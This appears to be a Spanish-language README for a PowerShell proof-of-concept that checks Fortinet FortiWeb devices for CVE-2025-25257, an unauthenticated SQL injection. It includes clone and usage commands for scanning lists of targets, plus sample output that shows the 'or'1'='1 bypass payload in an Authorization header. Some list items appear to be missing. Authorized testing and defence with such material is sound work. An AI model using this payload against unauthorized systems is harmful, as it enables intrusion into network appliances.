
PoC de CVE-2025-25257 para uso educativo y/o pentesting autorizado.
Este script de PowerShell está diseñado únicamente para pruebas de penetración autorizadas. Prueba los dispositivos Fortinet FortiWeb para CVE-2025-25257, una vulnerabilidad de inyección SQL no autenticada en el endpoint /api/fabric/device/status.
El script:
Aviso importante:
Esta herramienta está destinada únicamente a un uso ético y autorizado en escenarios de pruebas de penetración o evaluación de vulnerabilidades. El uso no autorizado puede violar leyes como la Computer Fraud and Abuse Act (CFAA) o regulaciones equivalentes en su jurisdicción. Asegúrese de tener permiso explícito del propietario del objetivo antes de ejecutar este script. El autor no asume ninguna responsabilidad por el uso indebido.
Invoke-WebRequest integrado.git clone https://github.com/mr-r3b00t/CVE-2025-25257.git
cd CVE-2025-25257
El script se encuentra en script.ps1.
Ejecute el script desde PowerShell con una de las siguientes opciones:
Especifique una única IP o nombre DNS, opcionalmente con un puerto (por ejemplo, 192.168.1.1:443).
.\script.ps1 -Target "192.168.1.1:443"
O sin puerto (escanea los puertos predeterminados):
.\script.ps1 -Target "example.com"
Proporcione un archivo de texto con un objetivo por línea (por ejemplo, targets.txt).
.\script.ps1 -InputFile "targets.txt"
Ejemplo de contenido de targets.txt:
192.168.1.1:443
example.com
10.0.0.1
El script mostrará los resultados para cada objetivo y puerto, incluyendo:
Ejemplo de salida:
Testing https://192.168.1.1:443/api/fabric/device/status for CVE-2025-25257
Endpoint accessible (HEAD 200 OK). Proceeding with GET request for vulnerability test.
GET Response Status: 200
Potential vulnerability detected (200 OK with payload). Check content for confirmation.
GET Response Content: {"devices": [...]}
Authorization (Bearer AAAAAA'or'1'='1).¡Las contribuciones son bienvenidas! Haga un fork del repositorio y envíe una pull request con mejoras, correcciones de errores o funciones adicionales.
Este proyecto está bajo la Licencia MIT; consulte el archivo LICENSE para más detalles.
Para preguntas o incidencias, abra un issue en GitHub.